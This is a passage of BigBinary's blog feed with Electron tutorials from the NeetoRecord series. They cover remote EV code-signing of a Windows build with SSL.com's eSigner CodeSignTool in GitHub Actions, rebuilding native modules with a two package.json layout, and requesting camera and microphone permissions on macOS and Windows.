This method required code-signing to be executed from a local machine, which posed flexibility challenges, especially for team environments. Additionally, physical USB dongles are prone to loss or damage.</p><p>As a solution to this, many certificate providers now offer &quot;cloud-based EV signing,&quot; where the signing hardware is housed in their data centers, allowing us to remotely sign code.</p><p>In this blog, we will look into how we can remotely EV code-sign a Windows application built using Electron, using SSL.com's <a href="https://www.ssl.com/guide/esigner-codesigntool-command-guide/">eSigner CodeSignTool</a>.</p><h3>Purchase and validate the EV certificate from SSL.com</h3><p>For the NeetoRecord desktop application, we used an EV certificate from SSL.com, and hence we will use SSL.com as the example in this blog.</p><p>Once we sign into <a href="http://ssl.com/">SSL.com</a> and purchase the <a href="https://www.ssl.com/certificates/ev-code-signing/buy/">EV code-signing certificate</a>, we need to validate the certificate. For this, we need to fill out the <strong>EV subscriber agreement</strong> and <strong>EV authorization form</strong>. Both of them can be downloaded from <a href="https://www.ssl.com/faqs/what-are-the-requirements-for-ssl-com-ev-certificates/">here</a>. Also, make sure we have a <a href="http://www.dnb.com/get-a-duns-number.html">D-U-N-S</a> number or equivalent ready before starting the validation process. To know about all the requirements in detail, follow <a href="https://www.ssl.com/faqs/what-are-the-requirements-for-ssl-com-ev-certificates/">this article</a> or watch this <a href="https://www.youtube.com/watch?v=y9rhsL7jZnc">YouTube video</a>.</p><h3>eSigner and CodeSignTool</h3><p><a href="https://www.ssl.com/esigner/">eSigner</a> is SSL.com's cloud signing service that allows remote access to its HSM hardware from anywhere.
We can use our SSL.com signing credentials to access it.</p><p><a href="https://www.ssl.com/guide/esigner-codesigntool-command-guide/">CodeSignTool</a> is a command-line tool for remotely signing various types of files, like MSI installers, Microsoft Authenticode executables, etc., with eSigner EV code-signing certificates. Hashes of the files are sent to SSL.com for signing, so the code itself is not sent. This is ideal where sensitive files need to be signed but should not be sent over the wire for signing. CodeSignTool is also ideal for automated batch processes for high-volume signings or integration into existing CI/CD pipeline workflows.</p><h3>Enroll in eSigner</h3><p>To be able to code-sign the application using eSigner, we need to first enroll in eSigner. To do so,</p><ul><li>Navigate to an issued Code-signing order in our SSL.com account. Note that the order is labeled eSigner Ready.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-code-signing-01.png" alt="esigner ready"></li><li>Click one of the download links.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-code-signing-02.png" alt="download link"></li><li>Create and confirm a 4-digit PIN and click the create PIN button.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-code-signing-03.png" alt="set pin"></li><li>Our certificate will be generated, and after a few moments, a QR code will appear above the certificate downloads table.<img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-totp-secret.png" alt="QR code"></li></ul><p>When the eSigner QR code is displayed for our certificate, copy the secret code value shown and save it in a safe location. This is the TOTP (time-based one-time password) secret associated with our eSigner certificate.
Just as 2FA authentication software like Authy can scan this value from the QR code to generate valid OTPs for code-signing, CodeSignTool can use it to automatically generate OTPs during the signing process. In the next section, we will use this secret code as <code>totp_secret</code> while integrating with CodeSignTool.</p><p>For more information, check out these articles: <a href="https://www.ssl.com/guide/remote-ev-code-signing-with-esigner/">How to Enroll in eSigner</a> and <a href="https://www.ssl.com/how-to/automate-esigner-ev-code-signing/">Automate eSigner EV Code-signing</a>.</p><h3>Obtain Required Credentials</h3><p>We need to provide the following credentials to the CodeSignTool for it to successfully connect with eSigner and code-sign the application.</p><p>If we haven't purchased a certificate yet and want to try out how it works, SSL.com offers <a href="https://www.ssl.com/guide/esigner-demo-credentials-and-certificates/">eSigner Demo Credentials and Certificates</a>.</p><ul><li>username</li><li>password</li><li>totp_secret</li><li>credential_id</li></ul><p>For <code>username</code> and <code>password</code>, use the same credentials we used to sign in to SSL.com. If needed, we can also add additional users to the same account. For the <code>totp_secret</code>, use the secret code we saved during the eSigner enrollment process.</p><p><img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner-totp-secret.png" alt="QR code"></p><p>To obtain the <code>credential_id</code>, navigate to the certificate details section on the SSL.com dashboard.
The <code>credential_id</code> will be listed under <code>SIGNING CREDENTIALS</code>.</p><p><img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/ssl-com-credential-id.png" alt="credential id"></p><p>After acquiring all the credentials, add them to GitHub Secrets with the following names:</p><ul><li><code>username</code> -&gt; <code>WINDOWS_SIGN_USER_NAME</code></li><li><code>password</code> -&gt; <code>WINDOWS_SIGN_USER_PASSWORD</code></li><li><code>totp_secret</code> -&gt; <code>WINDOWS_SIGN_USER_TOTP</code></li><li><code>credential_id</code> -&gt; <code>WINDOWS_SIGN_CREDENTIAL_ID</code></li></ul><p>Load these secrets as environment variables in our GitHub Actions workflow.</p><pre><code class="language-yml">- name: Publish releases
  env:
    AWS_ACCESS_KEY_ID: ${{secrets.AWS_ACCESS_KEY}}
    AWS_SECRET_ACCESS_KEY: ${{secrets.AWS_SECRET}}
    WINDOWS_SIGN_USER_NAME: ${{ secrets.WINDOWS_SIGN_USER_NAME }}
    WINDOWS_SIGN_USER_PASSWORD: ${{ secrets.WINDOWS_SIGN_USER_PASSWORD }}
    WINDOWS_SIGN_USER_TOTP: ${{ secrets.WINDOWS_SIGN_USER_TOTP }}
    WINDOWS_SIGN_CREDENTIAL_ID: ${{ secrets.WINDOWS_SIGN_CREDENTIAL_ID }}
  run: npm exec electron-builder -- --publish always -mwl</code></pre><h3>Integrate CodeSignTool</h3><p>The Windows version of CodeSignTool is provided as a batch file (<code>CodeSignTool.bat</code>), while the Linux/macOS version is available as a shell script (<code>CodeSignTool.sh</code>). We can find the download links and more details about CodeSignTool in <a href="https://www.ssl.com/guide/esigner-codesigntool-command-guide/">this article</a>.</p><p>For our purposes, we'll be using the shell script.
Download the Linux/macOS version, unzip it, and place it in the root directory of our Electron project.</p><p>To integrate the <code>CodeSignTool</code> into the Electron build process, create a script (<code>./scripts/windows-sign.mjs</code>) that runs the <code>CodeSignTool</code> shell script.</p><pre><code class="language-js">import path from &quot;path&quot;;
import fs from &quot;fs&quot;;
import childProcess from &quot;child_process&quot;;
import { fileURLToPath } from &quot;url&quot;;

// __dirname is not available in ES modules (.mjs), so derive it manually.
const __dirname = path.dirname(fileURLToPath(import.meta.url));

const TEMP_DIR = path.join(__dirname, &quot;../release&quot;, &quot;temp&quot;);

if (!fs.existsSync(TEMP_DIR)) {
  fs.mkdirSync(TEMP_DIR);
}

const sign = file =&gt; {
  const USER_NAME = process.env.WINDOWS_SIGN_USER_NAME;
  const USER_PASSWORD = process.env.WINDOWS_SIGN_USER_PASSWORD;
  const CREDENTIAL_ID = process.env.WINDOWS_SIGN_CREDENTIAL_ID;
  const USER_TOTP = process.env.WINDOWS_SIGN_USER_TOTP;

  if (USER_NAME &amp;&amp; USER_PASSWORD &amp;&amp; USER_TOTP &amp;&amp; CREDENTIAL_ID) {
    console.log(`Windows code-signing ${file.path}`);

    const { name, dir } = path.parse(file.path);
    const tempFile = path.join(TEMP_DIR, name);
    const setDir = `cd ./CodeSignTool-v1.3.0`;
    const signFile = `./CodeSignTool.sh sign -input_file_path=&quot;${file.path}&quot; -output_dir_path=&quot;${TEMP_DIR}&quot; -credential_id=${CREDENTIAL_ID} -username=&quot;${USER_NAME}&quot; -password=&quot;${USER_PASSWORD}&quot; -totp_secret=&quot;${USER_TOTP}&quot;`;
    const moveFile = `mv &quot;${tempFile}.exe&quot; &quot;${dir}&quot;`;

    childProcess.execSync(`${setDir} &amp;&amp; ${signFile} &amp;&amp; ${moveFile}`, {
      stdio: &quot;inherit&quot;,
    });
  } else {
    console.warn(`windows-sign.mjs - Can't sign file, credentials are missing`);
    process.exit(1);
  }
};

export default sign;</code></pre><p>The script exports a <code>sign</code> function that accepts an object containing the path to the file that needs to be signed.
It reads all the necessary credentials from environment variables and then passes them, along with the file path, to CodeSignTool.</p><p>To finish up, pass this script to the <code>electron-builder</code> configuration.</p><pre><code class="language-json">&quot;build&quot;: {
  &quot;productName&quot;: &quot;MyProduct&quot;,
  &quot;win&quot;: {
    &quot;target&quot;: {
      &quot;target&quot;: &quot;nsis&quot;,
      &quot;arch&quot;: [
        &quot;x64&quot;
      ]
    },
    &quot;signingHashAlgorithms&quot;: [
      &quot;sha256&quot;
    ],
    &quot;sign&quot;: &quot;./scripts/windows-sign.mjs&quot;,
    &quot;publisherName&quot;: &quot;Neeto LLC&quot;,
    &quot;artifactName&quot;: &quot;${productName}-Setup-${version}.${ext}&quot;
  },
}</code></pre><p>Here, we pass the script path to the <code>win.sign</code> field in the <code>electron-builder</code> configuration. Once added, <code>electron-builder</code> will call this script for each file that needs to be signed.</p><p>Great! With this, we've completed the EV code-signing process for our Windows application. Now, when we run the GitHub Actions workflow, it will successfully code-sign our Windows application.</p><h3>SSL.com pricing</h3><p>As mentioned earlier, EV code-signing certificates are expensive. SSL.com charges $349 per year for an EV code-signing certificate, with discounts available for multi-year purchases. For more information, visit: https://www.ssl.com/certificates/ev-code-signing/buy/.</p><p>In addition to the certificate cost, we must also subscribe to the eSigner cloud signing service. The Tier 1 plan costs $100 per month and allows a maximum of 10 files to be signed, equating to a minimum of $10 per signing. An Electron application requires four files to be signed per build.
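The per-build arithmetic can be sketched as follows, using the prices and file counts quoted in this post (verify current pricing with SSL.com before relying on it):

```javascript
// Cost-per-signing and builds-per-month arithmetic for the eSigner tiers,
// using the figures quoted above (4 signed files per Electron build).
const filesPerBuild = 4;

const tiers = [
  { name: "Tier 1", monthlyCost: 100, signingsIncluded: 10 },
  { name: "Tier 2", monthlyCost: 300, signingsIncluded: 100 },
];

const summarize = ({ name, monthlyCost, signingsIncluded }) => ({
  name,
  costPerSigning: monthlyCost / signingsIncluded,
  buildsPerMonth: Math.floor(signingsIncluded / filesPerBuild),
});

console.log(tiers.map(summarize));
// Tier 1: $10/signing, 2 builds/month; Tier 2: $3/signing, 25 builds/month
```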
This means we can only build an Electron application twice per month under the Tier 1 plan.</p><p>If we need to build the application more than twice per month, we recommend upgrading to Tier 2. This plan costs $300 per month and allows up to 100 file signings, reducing the cost to $3 per signing. For more information, visit: https://www.ssl.com/guide/esigner-pricing-for-code-signing/.</p><p><img src="/blog_images/2024/ev-code-sign-windows-application-ssl-com/esigner_pricing.png" alt="esigner pricing"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Using native modules in Electron]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/native-modules-electron"/>
      <updated>2024-12-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/native-modules-electron</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 8 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>Native modules allow developers to access low-level APIs like hardwareinteraction, native GUI components, or other system-specific features. BecauseElectron applications run across different platforms (Windows, macOS, Linux),native modules must be compiled for each target platform. 
This can introduce challenges in cross-platform development.</p><p>To simplify this process, Electron provides tools like <a href="https://github.com/electron/rebuild">electron-rebuild</a> to automate the recompilation of native modules against Electron's custom Node.js environment, ensuring compatibility and stability in the Electron application.</p><h3>How to use electron-rebuild</h3><p><code>electron-rebuild</code> can automatically determine the version of Electron and handle the manual steps of downloading headers and rebuilding native modules for our app.</p><p>To do a manual rebuild, run the command below.</p><pre><code class="language-bash">./node_modules/.bin/electron-rebuild

# If we are on Windows
.\node_modules\.bin\electron-rebuild.cmd</code></pre><p>This process should be run after each native package is installed. We can add this command to the <code>postinstall</code> script to automate it.</p><pre><code class="language-json">&quot;scripts&quot;: {
  &quot;postinstall&quot;: &quot;./node_modules/.bin/electron-rebuild&quot;
  // ...others
}</code></pre><p>Since Electron uses Chromium browser windows as the user interface, we need to exclude any native modules from being bundled in the renderer process, which runs inside the browser window.
To achieve this, we need to separate frontend modules from native modules and install them in separate <code>node_modules</code> folders.</p><h3>Two package.json structure</h3><p>To tackle this problem, Electron developers started using a two <code>package.json</code> structure, where the first one, which sits at the root of the project, includes the <code>dependencies</code> that are needed for the user interface and all the <code>devDependencies</code> that are needed to develop, build, and package the application.</p><pre><code class="language-json">// root package.json
{
  &quot;name&quot;: &quot;my-app&quot;,
  &quot;version&quot;: &quot;1.0.0&quot;,
  &quot;description&quot;: &quot;A sample application&quot;,
  &quot;license&quot;: &quot;Apache-2.0&quot;,
  &quot;main&quot;: &quot;./src/main/main.mjs&quot;,
  &quot;dependencies&quot;: {
    &quot;react&quot;: &quot;^18.2.0&quot;,
    &quot;react-router-dom&quot;: &quot;5.3.3&quot;
  },
  &quot;devDependencies&quot;: {
    &quot;electron&quot;: &quot;^31.2.1&quot;,
    &quot;electron-builder&quot;: &quot;^25.0.1&quot;
  }
}</code></pre><p>And a second <code>package.json</code> file, located at <code>./app/package.json</code>, includes all the native dependencies that should only run in a Node.js environment.
The <code>electron-rebuild</code> <code>postinstall</code> script we discussed should be added to the <code>./app/package.json</code>.</p><pre><code class="language-json">// ./app/package.json
{
  &quot;name&quot;: &quot;my-app&quot;,
  &quot;version&quot;: &quot;1.0.0&quot;,
  &quot;description&quot;: &quot;A sample application&quot;,
  &quot;license&quot;: &quot;Apache-2.0&quot;,
  &quot;main&quot;: &quot;./dist/main/main.js&quot;,
  &quot;scripts&quot;: {
    &quot;postinstall&quot;: &quot;./node_modules/.bin/electron-rebuild&quot;
  },
  &quot;dependencies&quot;: {
    &quot;sqlite3&quot;: &quot;^5.1.7&quot;,
    &quot;sharp&quot;: &quot;^0.33.5&quot;
  }
}</code></pre><p>We can add a <code>postinstall</code> script in the root to automatically install the <code>dependencies</code> listed in <code>./app/package.json</code> when installing the root <code>package.json</code>.</p><pre><code class="language-json">// root package.json
{
  &quot;name&quot;: &quot;my-app&quot;,
  &quot;version&quot;: &quot;1.0.0&quot;,
  &quot;description&quot;: &quot;A sample application&quot;,
  &quot;license&quot;: &quot;Apache-2.0&quot;,
  &quot;main&quot;: &quot;./src/main/main.mjs&quot;,
  &quot;dependencies&quot;: {
    &quot;react&quot;: &quot;^18.2.0&quot;,
    &quot;react-router-dom&quot;: &quot;5.3.3&quot;
  },
  &quot;devDependencies&quot;: {
    &quot;electron&quot;: &quot;^31.2.1&quot;,
    &quot;electron-builder&quot;: &quot;^25.0.1&quot;
  },
  &quot;scripts&quot;: {
    &quot;postinstall&quot;: &quot;yarn --cwd ./app install&quot;
  }
}</code></pre><p>Now, if we run <code>yarn install</code> from the root, after installing root dependencies, it will install native dependencies in the <code>app/</code> folder and then rebuild the native packages. All in one command.</p><p>When building, we should output the frontend bundles to the <code>app/dist</code> folder. This way, when packaging, both our native packages and other dependencies will be contained within the app folder.
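</p><p>As a sketch of how packaging can pick up this layout (assuming <code>electron-builder</code>; the <code>app</code> path here follows this project's convention, not a default), the two package.json structure can be declared through the <code>directories.app</code> option so that <code>./app/package.json</code> and its contents become the packaged application root:</p><pre><code class="language-json">// root package.json (hypothetical electron-builder configuration)
&quot;build&quot;: {
  &quot;directories&quot;: {
    // package ./app (its package.json, node_modules and dist) as the app
    &quot;app&quot;: &quot;app&quot;
  }
}</code></pre><p>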
Read <a href="https://www.bigbinary.com/blog/publish-electron-application">this blog</a> to learn more about how to build and publish an Electron application.</p><pre><code>electron-app
  assets
  app
    node_modules
    dist
    package.json
  src
  node_modules
  package.json</code></pre><p>This approach works well while packaging the app, but during development, how can we access the native modules? To solve this, we need to create a symlink from <code>app/node_modules</code> to <code>src/main/node_modules</code>. We can create a script to handle this.</p><pre><code class="language-js">// ./scripts/link-modules.mjs
import fs from &quot;fs&quot;;

fs.symlinkSync(&quot;./app/node_modules&quot;, &quot;./src/main/node_modules&quot;, &quot;junction&quot;);</code></pre><p>We can run this script in <code>postinstall</code> as well:</p><pre><code class="language-json">// ./app/package.json
{
  &quot;name&quot;: &quot;my-app&quot;,
  &quot;version&quot;: &quot;1.0.0&quot;,
  &quot;description&quot;: &quot;A sample application&quot;,
  &quot;license&quot;: &quot;Apache-2.0&quot;,
  &quot;main&quot;: &quot;./dist/main/main.js&quot;,
  &quot;scripts&quot;: {
    &quot;link-modules&quot;: &quot;node ../scripts/link-modules.mjs&quot;,
    &quot;postinstall&quot;: &quot;./node_modules/.bin/electron-rebuild &amp;&amp; yarn link-modules&quot;
  },
  &quot;dependencies&quot;: {
    &quot;sqlite3&quot;: &quot;^5.1.7&quot;,
    &quot;sharp&quot;: &quot;^0.33.5&quot;
  }
}</code></pre><h3>Problem with two package.json structure</h3><p>In most JavaScript projects, metadata such as <code>version</code>, <code>name</code>, and <code>description</code> is typically stored in the root <code>package.json</code>. However, in this case, when packaging the app, we'll be including <code>./app/package.json</code> instead of the root <code>package.json</code>.
This means all metadata should be in <code>./app/package.json</code> rather than in the root file.</p><p>This approach poses a challenge, particularly with tasks like automatic version bumping. When updating the version or other metadata, changes need to be made in two places, which can lead to inconsistencies.</p><p>To simplify this process and avoid maintaining two separate <code>package.json</code> files, we can dynamically create <code>./app/package.json</code>, allowing us to manage everything in one place. Since we cannot add native dependencies directly to the root <code>dependencies</code>, we can introduce a new field called <code>nativeDependencies</code>. When dynamically generating <code>./app/package.json</code>, we can copy the <code>nativeDependencies</code> into the <code>dependencies</code> field of <code>./app/package.json</code>.</p><p>This can be accomplished by creating a script to automate the process:</p><pre><code class="language-js">// ./script/create-native-package-json.js
import fse from &quot;fs-extra&quot;;

const packageJson = JSON.parse(fse.readFileSync(&quot;./package.json&quot;, &quot;utf8&quot;));
const APP_DIR = &quot;./app/&quot;;

const releaseJson = {
  name: packageJson.name,
  version: packageJson.version,
  description: packageJson.description,
  license: packageJson.license,
  author: packageJson.author,
  main: &quot;./dist/main/main.js&quot;,
  scripts: {
    postinstall: &quot;./node_modules/.bin/electron-rebuild &amp;&amp; yarn link-modules&quot;,
    &quot;link-modules&quot;: &quot;node ../scripts/link-modules.mjs&quot;,
  },
  dependencies: packageJson.nativeDependencies,
};

fse.mkdirSync(APP_DIR, { recursive: true });
fse.writeFileSync(
  APP_DIR + &quot;package.json&quot;,
  JSON.stringify(releaseJson, null, 2)
);</code></pre><p>In the script, we first fetch the root <code>package.json</code>, create a JSON file, and copy all the metadata.
We then update the <code>main</code> field to point to the compiled version of <code>main.js</code>, copy <code>nativeDependencies</code> into the <code>dependencies</code>, and add the <code>postinstall</code> script for electron-rebuild and node_modules linking we discussed earlier.</p><p>We can run this script in the root <code>postinstall</code>, so that if we make any changes to <code>package.json</code>, it will be updated in <code>./app/package.json</code> during <code>yarn install</code>.</p><pre><code class="language-json">// root package.json
&quot;scripts&quot;: {
  &quot;nativeInstall&quot;: &quot;yarn --cwd ./app install&quot;,
  &quot;postinstall&quot;: &quot;node ./script/create-native-package-json.js &amp;&amp; yarn nativeInstall&quot;
  // ...others
}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Requesting camera and microphone permission in an Electron app]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron"/>
      <updated>2024-12-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/request-camera-micophone-permission-electron</id>
<content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a Loom alternative. The desktop application was built using Electron. In a series of blogs, we capture how we built the desktop application and the challenges we ran into. This blog is part 7 of the blog series. You can also read about <a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>, <a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>, <a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>, <a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>, <a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>, <a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>, <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and <a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>When developing an Electron app, handling permissions for the camera and microphone varies from platform to platform. On macOS, apps are denied access to the camera and microphone by default. To gain access, we must explicitly request these permissions from the user. On the other hand, Windows tends to grant these permissions to apps by default, although users can manually revoke them through the system settings.</p><h3>Updating entitlement file for Mac</h3><p>In macOS, applications are run with a limited set of permissions to limit potential damage from malicious code.
Depending on which Electron APIs our app uses, we may need to add additional entitlements to our app's entitlements file.</p><p>In macOS applications, entitlements or permissions are specified in a property list (<code>.plist</code>) file, which is an XML-based format.</p><pre><code class="language-xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE plist PUBLIC &quot;-//Apple//DTD PLIST 1.0//EN&quot; &quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;&gt;
&lt;plist version=&quot;1.0&quot;&gt;
  &lt;dict&gt;
    &lt;key&gt;com.apple.security.cs.allow-unsigned-executable-memory&lt;/key&gt;
    &lt;true/&gt;
    &lt;key&gt;com.apple.security.cs.allow-jit&lt;/key&gt;
    &lt;true/&gt;
    &lt;key&gt;com.apple.security.device.camera&lt;/key&gt;
    &lt;true/&gt;
    &lt;key&gt;com.apple.security.device.microphone&lt;/key&gt;
    &lt;true/&gt;
    &lt;key&gt;com.apple.security.device.audio-input&lt;/key&gt;
    &lt;true/&gt;
    &lt;key&gt;com.apple.security.cs.allow-dyld-environment-variables&lt;/key&gt;
    &lt;true/&gt;
  &lt;/dict&gt;
&lt;/plist&gt;</code></pre><p>For our purpose, we need the <code>com.apple.security.device.camera</code> entitlement for the camera, and the <code>com.apple.security.device.microphone</code> and <code>com.apple.security.device.audio-input</code> entitlements for the microphone.</p><h3>Configuring in electron-builder</h3><p><a href="https://www.electron.build/">electron-builder</a> is a popular package for building, packaging, and distributing Electron applications.</p><p>We need to ensure that the path to <code>entitlements.plist</code> is correctly set in the <code>electron-builder</code> configuration.</p><pre><code class="language-json">&quot;build&quot;: {
  &quot;productName&quot;: &quot;AppName&quot;,
  &quot;appId&quot;: &quot;com.neeto.AppName&quot;,
  &quot;mac&quot;: {
    &quot;target&quot;: {
      &quot;target&quot;: &quot;default&quot;,
      &quot;arch&quot;: [
        &quot;arm64&quot;,
        &quot;x64&quot;
      ]
    },
    &quot;type&quot;: &quot;distribution&quot;,
    &quot;entitlements&quot;: &quot;assets/entitlements.mac.plist&quot;
  }
}</code></pre><p>We also need to provide a description of the camera and microphone's usage in the <code>Info.plist</code>. We don't have to create an <code>Info.plist</code> when using <code>electron-builder</code>; it will create and handle it internally, and any additional info can be passed using the <code>extendInfo</code> key.</p><pre><code class="language-json">&quot;build&quot;: {
  &quot;productName&quot;: &quot;AppName&quot;,
  &quot;appId&quot;: &quot;com.neeto.AppName&quot;,
  &quot;mac&quot;: {
    &quot;target&quot;: {
      &quot;target&quot;: &quot;default&quot;,
      &quot;arch&quot;: [&quot;arm64&quot;, &quot;x64&quot;]
    },
    &quot;type&quot;: &quot;distribution&quot;,
    &quot;entitlements&quot;: &quot;assets/entitlements.mac.plist&quot;,
    &quot;entitlementsInherit&quot;: &quot;assets/entitlements.mac.plist&quot;,
    &quot;extendInfo&quot;: {
      &quot;NSMicrophoneUsageDescription&quot;: &quot;Please give us access to your microphone&quot;,
      &quot;NSCameraUsageDescription&quot;: &quot;Please give us access to your camera&quot;
    }
  }
}</code></pre><p>The above code will add <code>NSMicrophoneUsageDescription</code> and <code>NSCameraUsageDescription</code> to the <code>Info.plist</code>.</p><h3>Requesting permission</h3><p>Electron's <a href="https://www.electronjs.org/docs/latest/api/system-preferences">systemPreferences</a> module exposes events and methods to access and alter system preferences.</p><p>Before requesting permission, we can use the <code>systemPreferences.getMediaAccessStatus</code> method to check if we already have the access.</p><pre><code class="language-js">import { systemPreferences } from &quot;electron&quot;;

const hasMicrophonePermission =
  systemPreferences.getMediaAccessStatus(&quot;microphone&quot;)
  === &quot;granted&quot;;
const hasCameraPermission =
  systemPreferences.getMediaAccessStatus(&quot;camera&quot;) === &quot;granted&quot;;</code></pre><p>For the camera and microphone, if permission is granted, it will return <code>granted</code>; otherwise, depending on the platform and permission settings, it will return <code>not-determined</code>, <code>denied</code>, <code>restricted</code> or <code>unknown</code>.</p><p><strong>For Mac</strong>, we can use the <code>systemPreferences.askForMediaAccess</code> method to request permission. This method will return a promise that resolves with <code>true</code> if consent was granted and <code>false</code> if it was denied.</p><pre><code class="language-js">const cameraGranted = await systemPreferences.askForMediaAccess(&quot;camera&quot;);
const microPhoneGranted = await systemPreferences.askForMediaAccess(
  &quot;microphone&quot;
);</code></pre><p>When we call this method, it will open a system alert asking the user to grant permission.</p><p><img src="/blog_images/2024/request-camera-micophone-permission-electron/camera-permission-alert.png" alt="camera permission"></p><p>If the user denies the permission the very first time, this method call will not open the system alert again.
Now, we have to open the system preference pane and ask the user to enable it from there.</p><pre><code class="language-js">import { shell } from &quot;electron&quot;;

const cameraGranted = await systemPreferences.askForMediaAccess(&quot;camera&quot;);
if (!cameraGranted) {
  shell.openExternal(
    &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Camera&quot;
  );
}

const microPhoneGranted = await systemPreferences.askForMediaAccess(
  &quot;microphone&quot;
);
if (!microPhoneGranted) {
  shell.openExternal(
    &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Microphone&quot;
  );
}</code></pre><p>To open the preference pane, we can use the <a href="https://www.electronjs.org/docs/latest/api/shell">shell</a> module. <code>shell.openExternal</code> can be used to call any external protocol URL.</p><p>Here we are opening <code>System preferences (x-apple.systempreferences)</code> -&gt; <code>Privacy &amp; Security (com.apple.preference.security)</code> -&gt; <code>Camera (Privacy_Camera)</code> or <code>Microphone (Privacy_Microphone)</code>.</p><p><img src="/blog_images/2024/request-camera-micophone-permission-electron/camera-settings-mac.png" alt="camera permission"></p><p>Since we asked the user to open the preference pane after they initially denied permission, if they choose to enable it this time, we should ask them to relaunch the application. Only then will the updated permission settings take effect.</p><p><strong>Windows</strong> has global settings for controlling the camera and microphone. The good thing is that they are enabled by default.
But in case the user explicitly disables it, one thing we can do is open the privacy settings page of the camera and microphone and ask the user to re-enable it.</p><pre><code class="language-js">const hasMicrophonePermission =
  systemPreferences.getMediaAccessStatus(&quot;microphone&quot;) === &quot;granted&quot;;
if (!hasMicrophonePermission) {
  shell.openExternal(&quot;ms-settings:privacy-microphone&quot;);
}

const hasCameraPermission =
  systemPreferences.getMediaAccessStatus(&quot;camera&quot;) === &quot;granted&quot;;
if (!hasCameraPermission) {
  shell.openExternal(&quot;ms-settings:privacy-webcam&quot;);
}</code></pre><p><img src="/blog_images/2024/request-camera-micophone-permission-electron/windows-camera.png" alt="windows camera permission"></p><p>Just like we did for Mac, we use the <code>shell.openExternal</code> method to open <code>Settings (ms-settings)</code> -&gt; <code>Privacy</code> -&gt; <code>Camera (privacy-webcam)</code> or <code>Microphone (privacy-microphone)</code>.</p><p>And we are done!
Here is everything put together.</p><pre><code class="language-js">import { shell, systemPreferences } from &quot;electron&quot;;

const checkMicrophonePermission = async () =&gt; {
  const hasMicrophonePermission =
    systemPreferences.getMediaAccessStatus(&quot;microphone&quot;) === &quot;granted&quot;;
  if (hasMicrophonePermission) return;

  if (process.platform === &quot;darwin&quot;) {
    const microPhoneGranted = await systemPreferences.askForMediaAccess(
      &quot;microphone&quot;
    );
    if (!microPhoneGranted) {
      shell.openExternal(
        &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Microphone&quot;
      );
    }
  } else if (process.platform === &quot;win32&quot;) {
    shell.openExternal(&quot;ms-settings:privacy-microphone&quot;);
  }
};

const checkCameraPermission = async () =&gt; {
  const hasCameraPermission =
    systemPreferences.getMediaAccessStatus(&quot;camera&quot;) === &quot;granted&quot;;
  if (hasCameraPermission) return;

  if (process.platform === &quot;darwin&quot;) {
    const cameraGranted = await systemPreferences.askForMediaAccess(&quot;camera&quot;);
    if (!cameraGranted) {
      shell.openExternal(
        &quot;x-apple.systempreferences:com.apple.preference.security?Privacy_Camera&quot;
      );
    }
  } else if (process.platform === &quot;win32&quot;) {
    shell.openExternal(&quot;ms-settings:privacy-webcam&quot;);
  }
};</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Building deep-links in Electron application]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/deep-link-electron-app"/>
      <updated>2024-11-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deep-link-electron-app</id>
